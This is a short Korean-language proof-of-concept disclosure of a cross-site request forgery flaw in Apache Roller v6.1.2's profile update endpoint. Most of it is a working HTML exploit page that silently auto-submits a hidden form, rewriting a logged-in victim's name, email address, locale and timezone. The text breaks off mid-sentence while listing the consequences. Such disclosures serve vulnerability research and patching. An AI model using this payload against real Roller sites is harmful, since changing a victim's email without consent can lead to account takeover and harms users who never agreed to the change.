
Apache Roller v6.1.2 프로필 업데이트 엔드포인트의 CSRF 취약점에 대한 PoC 익스플로잇입니다. 승인되지 않은 프로필 변경을 시연하기 위한 HTML 폼 익스플로잇 코드를 포함합니다.
Roller v6.1.2 및 이하 버전에서 엔드포인트 /roller/roller-ui/profile!save.rol에 사이트 간 요청 위조(CSRF) 취약점이 발견되었습니다.
이 취약점으로 인해 공격자는 조작된 HTML 페이지를 통해 피해자 사용자의 프로필 정보(예: 이메일, 전체 이름, 로케일, 시간대)를 임의로 업데이트할 수 있습니다.
이 취약점은 CSRF 보호 없이 사용자의 프로필을 업데이트하는 /roller/roller-ui/profile!save.rol에 대한 무단 요청을 허용합니다.
<html>
<head>
<form id="exploitForm" action="http://localhost:8080/roller/roller-ui/profile!save.rol" method="POST">
<input name="bean.userName" value="vanlam" type="hidden">
<input name="bean.screenName" value="hacked" type="hidden">
<input name="bean.fullName" value="hacked" type="hidden">
<input name="bean.emailAddress" value="[email protected]" type="hidden">
<input name="bean.passwordText" value="" type="hidden">
<input name="bean.passwordConfirm" value="" type="hidden">
<input name="bean.locale" value="vi_VN" type="hidden">
<input name="bean.timeZone" value="Asia/Bangkok" type="hidden">
</form>
<script>
document.getElementById('exploitForm').submit();
</script>
</head>
</html>
bean.userName: vanlambean.screenName: hackedbean.fullName: hackedbean.emailAddress: [email protected]bean.passwordText: (비어 있음)bean.passwordConfirm: (비어 있음)bean.locale: vi_VNbean.timeZone: Asia/Bangkok공격자는 악성 HTML 페이지를 제작하여 인증된 Roller 사용자가 해당 페이지를 방문할 경우 피해자의 동의 없이 프로필 정보를 업데이트하는 폼이 자동으로 제출되도록 할 수 있습니다. 이로 인해 다음과 같은 문제가 발생할 수 있습니다: